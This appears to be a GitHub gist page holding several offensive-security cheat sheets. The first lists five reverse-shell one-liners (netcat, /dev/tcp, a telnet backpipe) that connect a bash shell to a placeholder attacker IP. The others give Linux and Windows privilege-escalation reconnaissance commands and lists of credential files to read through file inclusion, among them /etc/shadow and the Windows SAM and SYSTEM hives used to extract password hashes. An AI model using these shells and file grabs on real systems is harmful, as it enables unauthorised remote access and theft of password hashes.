waywardsun
waywardsun
/ netcat_reverse_shell_backpipe
Created
September 20, 2016 22:44
— forked from sckalath/netcat_reverse_shell_backpipe
Netcat without netcat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #1 | |
| nc <attacker_ip> <port> -e /bin/bash | |
| #2 | |
| mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
| #3 | |
| /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 | |
| #4 | |
| mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe | |
| #5 | |
| telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> |
waywardsun
/ linux_privesc
Created
September 20, 2016 22:44
— forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Determine linux distribution and version | |
| cat /etc/issue | |
| cat /etc/*-release | |
| cat /etc/lsb-release | |
| cat /etc/redhat-release | |
| // Determine kernel version - 32 or 64-bit? | |
| cat /proc/version | |
| uname -a | |
| uname -mrs |
waywardsun
/ windows_privesc
Created
September 20, 2016 22:44
— forked from sckalath/windows_privesc
Windows Privilege Escalation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // What system are we connected to? | |
| systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
| // Get the hostname and username (if available) | |
| hostname | |
| echo %username% | |
| // Get users | |
| net users | |
| net user [username] |
waywardsun
/ linux_blind
Created
September 20, 2016 22:43
— forked from sckalath/linux_blind
Linux Blind Files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Use these if you have a simple command shell through LFI or something similar. | |
| /etc/issue (A message or system identification to be printed before the login prompt.) | |
| /etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) | |
| /etc/passwd | |
| /etc/group | |
| /etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) | |
| /etc/shadow | |
| /home/[USERNAME]/.bash_history or .profile | |
| ~/.bash_history or .profile |
waywardsun
/ windows_blind
Created
September 20, 2016 22:43
— forked from sckalath/windows_blind
Windows Blind Files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %SYSTEMDRIVE%\boot.ini | |
| %WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\system | |
| %SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
| %WINDIR%\repair\sam | |
| %WINDIR%\repair\system |
NewerOlder